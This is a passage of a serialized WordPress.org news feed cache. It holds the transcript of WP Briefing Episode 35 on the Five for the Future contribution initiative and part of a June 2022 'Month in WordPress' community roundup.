href=\"https://profiles.wordpress.org/oztaser/\">Adil Öztaşer</a>, <a href=\"https://profiles.wordpress.org/andrewserong/\">Andrew Serong</a>, <a href=\"https://profiles.wordpress.org/annezazu/\">annezazu</a>, <a href=\"https://profiles.wordpress.org/bernhard-reiter/\">Bernie Reiter</a>, <a href=\"https://profiles.wordpress.org/cbravobernal/\">Carlos Bravo</a>, <a href=\"https://profiles.wordpress.org/poena/\">Carolina Nymark</a>, <a href=\"https://profiles.wordpress.org/critterverse/\">Channing Ritter</a>, <a href=\"https://profiles.wordpress.org/costdev/\">Colin Stewart</a>, <a href=\"https://profiles.wordpress.org/petitphp/\">Clement Boirie</a>, <a href=\"https://profiles.wordpress.org/danieliser/\">Daniel Iser</a>, <a href=\"https://profiles.wordpress.org/denishua/\">denishua</a>, <a href=\"https://profiles.wordpress.org/dd32/\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/kebbet/\">Erik Betshammar</a>, <a href=\"https://profiles.wordpress.org/gabertronic/\">Gabriel Rose</a>, <a href=\"https://profiles.wordpress.org/mamaduka/\">George Mamadashvili</a>, <a href=\"https://profiles.wordpress.org/georgestephanis/\">George Stephanis</a>, <a href=\"https://profiles.wordpress.org/glendaviesnz/\">Glen Davies</a>, <a href=\"https://profiles.wordpress.org/grantmkin/\">Grant M. Kinney</a>, <a href=\"https://profiles.wordpress.org/gziolo/\">Greg Ziółkowski</a>, <a href=\"https://profiles.wordpress.org/ironprogrammer/\">ironprogrammer</a>, <a href=\"https://profiles.wordpress.org/jameskoster/\">James Koster</a>, <a href=\"https://profiles.wordpress.org/audrasjb/\">Jb Audras</a>, <a href=\"https://profiles.wordpress.org/jnz31/\">jnz31</a>, <a href=\"https://profiles.wordpress.org/desrosj/\">Jonathan Desrosiers</a>, <a href=\"https://profiles.wordpress.org/spacedmonkey/\">Jonny Harris</a>, <a href=\"https://profiles.wordpress.org/ryelle/\">Kelly Choyce-Dwan</a>, <a href=\"https://profiles.wordpress.org/knutsp/\">Knut Sparhell</a>, <a href=\"https://profiles.wordpress.org/luisherranz/\">Luis Herranz</a>, <a href=\"https://profiles.wordpress.org/onemaggie/\">Maggie Cabrera</a>, <a href=\"https://profiles.wordpress.org/manfcarlo/\">manfcarlo</a>, <a href=\"https://profiles.wordpress.org/manzurahammed/\">Manzur Ahammed</a>, <a href=\"https://profiles.wordpress.org/matveb/\">Matias Ventura</a>, <a href=\"https://profiles.wordpress.org/czapla/\">Michal Czaplinski</a>, <a href=\"https://profiles.wordpress.org/mcsf/\">Miguel Fonseca</a>, <a href=\"https://profiles.wordpress.org/mukesh27/\">Mukesh Panchal</a>, <a href=\"https://profiles.wordpress.org/navigatrum/\">navigatrum</a>, <a href=\"https://profiles.wordpress.org/ndiego/\">Nick Diego</a>, <a href=\"https://profiles.wordpress.org/ntsekouras/\">Nik Tsekouras</a>, <a href=\"https://profiles.wordpress.org/swissspidy/\">Pascal Birchler</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc/\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/presskopp/\">Presskopp</a>, <a href=\"https://profiles.wordpress.org/ramonopoly/\">Ramon James Dodd</a>, <a href=\"https://profiles.wordpress.org/ravipatel/\">Ravikumar Patel</a>, <a href=\"https://profiles.wordpress.org/youknowriad/\">Riad Benguella</a>, <a href=\"https://profiles.wordpress.org/samikeijonen/\">Sami Keijonen</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/timothyblynjacobs/\">Timothy Jacobs</a>, <a href=\"https://profiles.wordpress.org/tobifjellner/\">tobifjellner (Tor-Bjorn Fjellner)</a>, <a href=\"https://profiles.wordpress.org/nathannoom/\">Trinadin</a>, and <a href=\"https://profiles.wordpress.org/grapplerulrich/\">Ulrich Pogson</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13138\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WP Briefing: Episode 35: Five for the Future’s True Intentions\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://wordpress.org/news/2022/07/episode-35-five-for-the-futures-true-intentions/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 11 Jul 2022 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=13132\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:140:\"On this week\'s episode of the WordPress Briefing, Josepha answers questions about the intentions behind the Five for the Future initiative. \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2022/07/WP-Briefing-035.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Santana Inniss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:14788:\"\n<p>In the thirty-fifth episode of the WordPress Briefing, Josepha Haden Chomphosy tackles questions about the true intentions of the Five for the Future initiative.</p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<p>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a><br>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/beafialho/\">Beatriz Fialho</a><br>Production:&nbsp;<a href=\"https://profiles.wordpress.org/santanainniss/\">Santana Inniss</a><br>Song: Fearless First by Kevin MacLeod</p>\n\n\n\n<h2>References</h2>\n\n\n\n<ol><li><a href=\"https://make.wordpress.org/themes/2022/06/30/create-block-theme/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/themes/2022/06/30/create-block-theme/\">New Create Block Theme plugin</a></li><li><a href=\"https://make.wordpress.org/design/2022/07/01/open-sourcing-theme-designs/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/design/2022/07/01/open-sourcing-theme-designs/\">Open Sourcing Theme Designs </a></li><li><a href=\"https://make.wordpress.org/meta/2022/07/01/exploration-improving-devhub/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/meta/2022/07/01/exploration-improving-devhub/\">Exploration in Meta to improve DevHub </a></li><li><a href=\"https://en.wikipedia.org/wiki/Tragedy_of_the_commons\" data-type=\"URL\" data-id=\"https://en.wikipedia.org/wiki/Tragedy_of_the_commons\">Tragedy of the Commons definition</a></li></ol>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-13132\"></span>\n\n\n\n<p>[Josepha Haden Chomphosy 00:00:10]&nbsp;&nbsp;</p>\n\n\n\n<p>Hello everyone. And welcome to the WordPress Briefing, the podcast where you can catch quick explanations of some of the ideas behind the WordPress open source project and the community around it, as well as get a small list of big things coming up in the next two weeks. I&#8217;m your host Josepha Haden Chomphosy. Here we go!</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:00:40]&nbsp;&nbsp;</p>\n\n\n\n<p>Today I&#8217;m talking about Five for the Future– again. Before we get stuck right into the heart of it, 10 episodes ago, in episode 25, I focused on the Five for the Future initiative and I recommend that you listen to that before you join me in today&#8217;s episode. It&#8217;s only eight minutes and it gives you a history of the Five for the Future initiative, as well as some information on the Five for the Future program.</p>\n\n\n\n<p>It then goes on to talk about some of the original intentions behind that original initiative. The reason I bring this back up today is partially because one, I will talk about both the program and the initiative it&#8217;s based on literally anytime. I believe strongly that they are both a vital part of what will result in a triumph of the commons of WordPress, and keep this empowering project around for years to come.&nbsp;</p>\n\n\n\n<p>But I also bring it up today because there&#8217;s conversation about a post I published a couple of months back that has generated some dialogue around the intentions of this catchy call to contribution. So to make sure that as we move through this discussion together, we are working with as much factual information as possible, I present to you some facts.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:01:46]&nbsp;&nbsp;</p>\n\n\n\n<p>First and foremost, the pillars of this initiative. The 5% in Five for the Future is aspirational. Contribution to open source is a question and indication of privilege. So the 5% is not a requirement, but rather it&#8217;s an aim. It could refer to 5% of your time or 5% of your resources, or just any amount of your time or resources around. Regardless of how you&#8217;re defining it, it is an aspiration, not a requirement.&nbsp;</p>\n\n\n\n<p>The second pillar, pledges show your intention and whatever contributions you are able to offer after you&#8217;ve made your pledge are always welcome. No one is out there checking for 100% completion of the hours that you intended to give back to WordPress versus the hours that you actually succeeded at giving back to WordPress.</p>\n\n\n\n<p>There are so many volunteers that make sure that this project is running and functional and has plenty of people knowing how to get things done and how to teach others how to get things done. It&#8217;s all coming from generosity of heart.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:02:52]&nbsp;&nbsp;</p>\n\n\n\n<p>And speaking of generosity, the third thing that is important about this initiative is that it insists on and wants to celebrate a culture of generosity. Beyond the concept of a pledge, is the idea of generous collaboration toward the long term health and stability of our project for the future.</p>\n\n\n\n<p>As contributors, we understand that we are greater than the sum of our parts and what we build <em>within</em> WordPress empowers those who build <em>with</em> WordPress. So those are the pillars that went into that initial thought, that opening Five for the Future call to action that Matt gave to everybody in 2014.</p>\n\n\n\n<p>And so now I want to share with you some of the pillars of the program that has grown up around it. So the Five for the Future initiative, if you&#8217;re not familiar, was started in 2014 and is a grand call to all of us to remember to give back to the shared commons of WordPress. Its aim was to help guard against what is called the “tragedy of the commons,” where resources are continually taken out and not necessarily reinvested in. No one&#8217;s necessarily putting anything back into those.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:04:06]&nbsp;&nbsp;</p>\n\n\n\n<p>So that&#8217;s the starting point for all of this. So the program, the Five for the Future program, in 2018 was built as a collaborative effort with full participation and buy-in from the contributors who were active in the project at the time. It allowed anyone to raise their hands, to show support of WordPress via a pledge and also started a multi-year discussion of how to define contributions in a way that let us automatically provide props and therefore more effectively put badges on people&#8217;s wordpress.org profiles.&nbsp;</p>\n\n\n\n<p>And then in 2019, there was an additional pilot of the program, which kind of offered some team structure, which was intended to not only take on work that I don&#8217;t like to ask volunteers to do, but also to provide some checks and balances to an absolute raft of sponsored contributor hours that we had started to see show up.&nbsp;</p>\n\n\n\n<p>Which brings us then to the post that I mentioned at the start. Knowledgeable supporters of the WordPress open source project have debated next iterations to Five for the Future activity and programming. So, to bring the conversation to a central set of questions, or rather to bring the conversation to a central spot, I raised these two questions. One, what activities can we see inside our contributor networks? So wordpress.org, make.wordpress.org, the Rosetta sites that we have, Slack, et cetera.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:05:30]&nbsp;&nbsp;</p>\n\n\n\n<p>So what activities can we see inside the contributor networks that we can flag to enable easier distribution of props and therefore badges? The second question is, what activities can we see also in those contributor networks that appear to be contributions, but in the end are only benefiting the person or company that provides the contributions?</p>\n\n\n\n<p>For what it&#8217;s worth that discussion then also raised a third question that I don&#8217;t think we&#8217;ve even started to tackle, which is what about the activities that are not in the contributor network, but still do move WordPress forward? Cause there are so, so many of those things and it&#8217;s a great question. I don&#8217;t have an answer and just so that I don&#8217;t leave you all with a series of questions for which there are no answers provided in this particular podcast, I do have a few answers for questions that I have seen floating around this discussion.&nbsp;</p>\n\n\n\n<p>So the first question is actually a bunch of questions. There are like three parts to it. What are props, who gives props, and who tracks them? So ‘props’ is a term used in WordPress to describe shared recognition of a contribution. Think of it as like a hat tip or kudos or an assist. However you think about it, it&#8217;s recognition of the other people who helped to solve a problem along the way. That is what props are.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:06:47]&nbsp;&nbsp;</p>\n\n\n\n<p>The second part of that question is who gives props and historically developers have given props, which tends to mean that it&#8217;s mostly developers who get props. But now, also, any team rep during a release cycle can provide props to folks on their team, volunteers on their team who were really helpful during the course of the release.</p>\n\n\n\n<p>And recently we also added the functionality for ad hoc props to be given in the Slack props channel, and those get added to your profile activity. So that someone can give you basically a public thanks for having helped on something that they were working on. And then that gets logged in your activity tracker on your WordPress.org profile.</p>\n\n\n\n<p>And then the final question in that first big question is who tracks these props? And the answer is human beings! Which is why folks feel like they have to do a ton of things before they even get props. And that&#8217;s also why I&#8217;d like to automate more and more of them so that you don&#8217;t have to do a ton of things in order for someone to show up and acknowledge that you are part of a solution.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:07:51]&nbsp;&nbsp;</p>\n\n\n\n<p>So the second question that I&#8217;ve seen kind of running around is, where do props start? And that is a great question that has been asked year after year. And one that I think we should continue to ask. The reality is that we won&#8217;t be able to see every contribution to WordPress, but that doesn&#8217;t mean that they aren&#8217;t valuable. And it doesn&#8217;t mean that they don&#8217;t matter.&nbsp;</p>\n\n\n\n<p>Building our culture of generosity helps us to better recognize and celebrate each other for all of our contributions, whether they are for a major release or a major event, or one of these new ad hoc props that you can offer to people. And if we see more and more of the same type of contributions being celebrated, then we can also work toward automating those as well, so that you don&#8217;t have to do a super ton of them before someone has noticed that you&#8217;ve done even one of them.&nbsp;</p>\n\n\n\n<p>And the third big question that has been running around is, what about the people who don&#8217;t want the props? If people want to be literally anonymous, then deletion requests are probably your way to go. But I actually don&#8217;t think that&#8217;s the question here. I think the question is what if a prop holds no intrinsic value to you and then, you know, I wanna thank you for that spirit of generosity. And I also wanna say that I&#8217;m so glad you&#8217;re here.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:09:02]&nbsp;&nbsp;&nbsp;</p>\n\n\n\n<p>Hopefully, all of these answers clarify what lies at the heart of what is intended with the Five for the Future initiative and the program that&#8217;s built on top of it. And why I care so much about fixing the ways we offer props to folks. For me, it&#8217;s not about assessing the worthiness of people or companies or any of their contributions. For me, it&#8217;s about reinvesting in the shared commons of the WordPress ecosystem, by finding a way that our economy can entice folks to put back into WordPress, something close to the benefit that they receive from it.</p>\n\n\n\n<p>And that brings us now to our small list of big things. Thank you all for making it into the final stretches with me. These three things that I&#8217;m sharing also have companion blog posts to go with them because they are very big questions or very big features, very big plugin kind of things that we&#8217;re looking at. And so you&#8217;ll be able to find those in the show notes, or you can go to wordpress.org/news if you&#8217;re listening to this in a podcast player of your choice that is not wordpress.org.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:10:10]&nbsp;&nbsp;&nbsp;</p>\n\n\n\n<p>So the first one on my list is a new plugin. It is called Create Block Theme. And it&#8217;s gonna make it easier for theme builders to use the existing site editor tools to create new block themes. I&#8217;m very excited about this. Uh, you can find it on make.wordpress.org/themes. And I will also include a link to it in the show notes below.&nbsp;</p>\n\n\n\n<p>If themes are not your area of expertise, but you are interested in documentation or the DevHub or to an extent design things, then the improvements that are being worked on for the DevHub are definitely in your area. That&#8217;s kind of a Meta task, but has a few other pieces involved as well. That can be found on make.wordpress.org/meta. But again, I will have a link to the very, very detailed blog post in the show notes.&nbsp;</p>\n\n\n\n<p>It&#8217;s got a bunch of hypothetical changes that are being suggested for the WordPress developer docs, uh, especially when it comes to the function reference. And so there are gonna be some slight design questions, but not like, graphic design/visual design, more in the like, can humans read this design area of things? And so that will be a good one to look at. If you are sort of in the Meta or Documentation vein of things in the way that you like to contribute to WordPress.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:011:30]&nbsp;&nbsp;&nbsp;</p>\n\n\n\n<p>And then the final thing is about open sourcing theme designs. So open sourcing everything obviously is important to us. And the design tool that we use, this tool called Figma, is open to the public. And so it&#8217;s possible for folks to be able to kind of get in there and use and reuse any design elements.</p>\n\n\n\n<p>And so there&#8217;s a discussion happening over on make.wordpress.org/design about how that can and should look in the future. And so if design is definitely your area, and again, this kind of lines up with themes a little bit, then wander over into that one, for which there will also be a link in the show notes.&nbsp;</p>\n\n\n\n<p>And that my friends is your small list of big things. Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy. And I&#8217;ll see you again in a couple of weeks.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13132\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:60:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"The Month in WordPress – June 2022\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/news/2022/07/the-month-in-wordpress-june-2022/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 06 Jul 2022 14:19:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:18:\"month in wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13069\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:313:\"With WordPress 6.1 already in the works, a lot of updates happened during June. Here&#8217;s a summary to catch up on the ones you may have missed.&#160; WordPress 6.1 is Slated for Release on October 25, 2022 Planning for WordPress 6.1 kicked off a few weeks ago with a proposed schedule and a call for [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"rmartinezduque\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:12416:\"\n<p>With WordPress 6.1 already in the works, a lot of updates happened during June. Here&#8217;s a summary to catch up on the ones you may have missed.&nbsp;</p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" />\n\n\n\n<h2>WordPress 6.1 is Slated for Release on October 25, 2022</h2>\n\n\n\n<p>Planning for WordPress 6.1 kicked off a few weeks ago with a <a href=\"https://make.wordpress.org/core/2022/06/23/wordpress-6-1-planning-roundup/\"><strong>proposed schedule and a call for contributors</strong></a> to the release team. This will be the third major release in 2022 and will include up to Gutenberg 14.1 for a total of 11 Gutenberg releases.</p>\n\n\n\n<p><a href=\"https://profiles.wordpress.org/matveb/\">Matías Ventura</a> published the preliminary <a href=\"https://make.wordpress.org/core/2022/06/04/roadmap-to-6-1/\">roadmap for version 6.1</a>, which is expected to refine the full site editing experience introduced in the last two major releases. Stay tuned for a companion post with more details on what’s to come.</p>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\"><p>Tune in to the <a href=\"https://wordpress.org/news/2022/06/episode-34-wordpress-6-1-is-coming/\">latest episode of WP Briefing</a> to hear WordPress Executive Director Josepha Haden discuss planning for major releases and how you can get involved.</p></blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>New in Gutenberg: Versions 13.4 and 13.5</h2>\n\n\n\n<p>There are two new versions of Gutenberg since last month’s edition of the Month in WordPress:</p>\n\n\n\n<ul><li><a href=\"https://make.wordpress.org/core/2022/06/10/whats-new-in-gutenberg-13-4-8-june/\"><strong>Gutenberg 13.4</strong></a> includes 25 enhancements and nearly 30 bug fixes. This version adds support for button elements in theme.json and introduces axial spacing in Gallery Block, among other new features.</li><li><a href=\"https://make.wordpress.org/core/2022/06/22/whats-new-in-gutenberg-13-5-22-june/\"><strong>Gutenberg 13.5</strong></a> was released on June 22, 2022. It comes with an improved featured image UX, expanded design tools for the Post Navigation Link block, and solid accessibility fixes.</li></ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\"><p>Follow the “<a href=\"https://make.wordpress.org/core/tag/gutenberg-new/\">What’s new in Gutenberg</a>” posts to stay up to date with the latest updates.</p></blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Team Updates: Gutenberg Page Redesign, Meetup Venue Support Funds, and More</h2>\n\n\n\n<ul><li><a href=\"https://wordpress.org/gutenberg/\">The Gutenberg page</a> got a new redesign! You can<strong> </strong>rearrange the page content the way you want and experience the flexibility that blocks allow. Learn more about the inspiration behind the new look in <a href=\"https://make.wordpress.org/design/2021/10/29/redesign-of-the-gutenberg-page/\">this post</a>.</li><li>WordPress Community Support (WPCS) restarted its <a href=\"https://make.wordpress.org/community/2022/06/22/announcement-reactivating-meetup-venue-support-funds/\">meetup venue support funds</a> for community organizers.</li><li>The Themes Team ​​released a <a href=\"https://make.wordpress.org/themes/2022/06/30/create-block-theme/\">new plugin called Create Block Theme</a> that makes it easier for theme builders to create block themes.</li><li>Matías Ventura, the lead architect of the Gutenberg project, shared some early thoughts on <a href=\"https://make.wordpress.org/design/2022/06/13/thinking-through-the-wordpress-admin-experience/\">the future of the WordPress admin interface</a>.</li><li>Each month, the Training Team publishes a list of new resources available on the Learn WordPress platform. <a href=\"https://make.wordpress.org/updates/2022/06/07/whats-new-on-learnwp-in-may-2022/\">Check out what’s new</a>.</li><li>The Polyglots Team kicked off conversations for planning the <a href=\"https://make.wordpress.org/polyglots/2022/06/15/wp-translation-day-in-september-2022-suggestion-discussion/\">next WordPress Translation Day</a>.</li><li>The Documentation Team posted a series of <a href=\"https://make.wordpress.org/docs/2022/06/13/live-onboarding-sessions-for-the-documentation-team/\">onboarding sessions</a> to get started with documentation.</li><li>After reviewing feedback raised by the community, the Performance Team proposed <a href=\"https://make.wordpress.org/core/2022/06/30/plan-for-adding-webp-multiple-mime-support-for-images/\">a new approach to add WebP and MIME support</a> for images.</li><li>The Themes Team updated its <a href=\"https://make.wordpress.org/themes/2022/06/18/complying-with-gdpr-when-using-google-fonts/\">recommendations for hosting webfonts</a> to follow Europe’s General Data Protection Regulation (GDPR).</li><li>In a step towards <a href=\"https://make.wordpress.org/design/2022/07/01/open-sourcing-theme-designs/\">open sourcing theme designs</a>, the Design Team made some themes authored by WordPress core and other theme developers available in a Figma file.</li><li>The Marketing Team started a discussion to gather feedback on <a href=\"https://make.wordpress.org/marketing/2022/06/17/discussion-promoting-wordcamps-with-the-official-wordpress-social-accounts/\">promoting WordCamps</a> with the official WordPress.org social accounts.</li><li>The Openverse Team <a href=\"https://make.wordpress.org/openverse/2022/06/17/mitigating-out-of-terms-api-usage/\">released version 2.5.5 of the Openverse API</a>, which brings an important change regarding anonymous API requests.</li><li>The Plugin Review Team shared a comprehensive <a href=\"https://make.wordpress.org/plugins/2022/06/15/whats-the-deal-with-invalid-reviews/\">post on invalid plugin reviews</a>.</li><li>The June edition of the <a href=\"https://make.wordpress.org/community/2022/06/24/monthly-organizer-newsletter-june-2022/\">Meetup Organizer Newsletter</a> is now live with a list of ideas on reactivating meetups.</li><li>Check out the <a href=\"https://make.wordpress.org/polyglots/2022/06/27/polyglots-monthly-newsletter-june-2022/\">Polyglots Monthly Newsletter: June 2022</a> to stay up to date with the latest updates from the Polyglots community.</li><li>The latest edition of People of WordPress features the story of web developer <a href=\"https://wordpress.org/news/2022/06/people-of-wordpress-leo-gopal/\">Leo Gopal</a>.</li><li><a href=\"https://block-museum.com/\">The Museum of Block Art</a> (MOBA), a virtual initiative that showcases creative uses of the WordPress block editor, is <a href=\"https://gutenbergtimes.com/museum-of-block-art-is-open-for-submissions/\">now open for submissions</a>.</li><li>Last month the WordPress community was saddened to hear of the passing of <a href=\"https://profiles.wordpress.org/wolly/\">Wolly</a> (Paolo Valenti). Wolly was a long-time WordPress contributor and one of the founding members of the vibrant Italian community. He will be missed.</li></ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\"><p>The BlackPress community is a great place to connect with black African descent people in the WordPress space, access tech resources, and advance your career skills. <a href=\"https://blackpresswp.com\">Join the BlackPress Community</a>.</p></blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Feedback/Testing Requests</h2>\n\n\n\n<ul><li>The Core Team is looking for <a href=\"https://make.wordpress.org/core/2022/06/26/rollback-feature-testing-call-to-action/\">help in testing a rollback functionality</a> for failed plugin and theme updates.</li><li>There’s an open call for feedback on a proposal to make building features and plugins on top of the WordPress REST API easier. <a href=\"https://make.wordpress.org/core/2022/07/04/proposal-better-rest-api-handling-in-javascript/\">Share your thoughts</a> by July 18, 2022.</li><li>The Training Team suggested a public content roadmap for <a href=\"https://make.wordpress.org/training/2022/06/29/learn-wordpress-development-creating-a-public-roadmap-for-content-creation/\">Learn WordPress development</a>. Comments are welcome until July 15, 2022.</li><li>Version 20.2 of WordPress for <a href=\"https://make.wordpress.org/mobile/2022/06/28/call-for-testing-wordpress-for-android-20-2/\">Android</a> and <a href=\"https://make.wordpress.org/mobile/2022/06/29/call-for-testing-wordpress-for-ios-20-2/\">iOS</a> is now available for testing.</li><li>Some members of the Meta Team did some experiments with <a href=\"https://make.wordpress.org/meta/2022/07/01/exploration-improving-devhub/\">hypothetical changes to the WordPress Developer Docs</a>. They welcome feedback on the next steps.</li></ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\"><p>Want to get involved in testing WordPress?<strong> </strong>Follow the &#8220;<a href=\"https://make.wordpress.org/test/tag/build-test-tools/\">Week in Test</a>&#8221; posts to find a handy list of links and opportunities.</p></blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" 